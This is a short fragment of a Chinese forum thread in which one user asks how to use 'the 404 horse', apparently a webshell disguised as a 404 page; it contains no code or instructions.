  亮了(0)
IDE (1级) 2017-01-16回复27楼

请问404的那个马咋使用的？

亮了(0)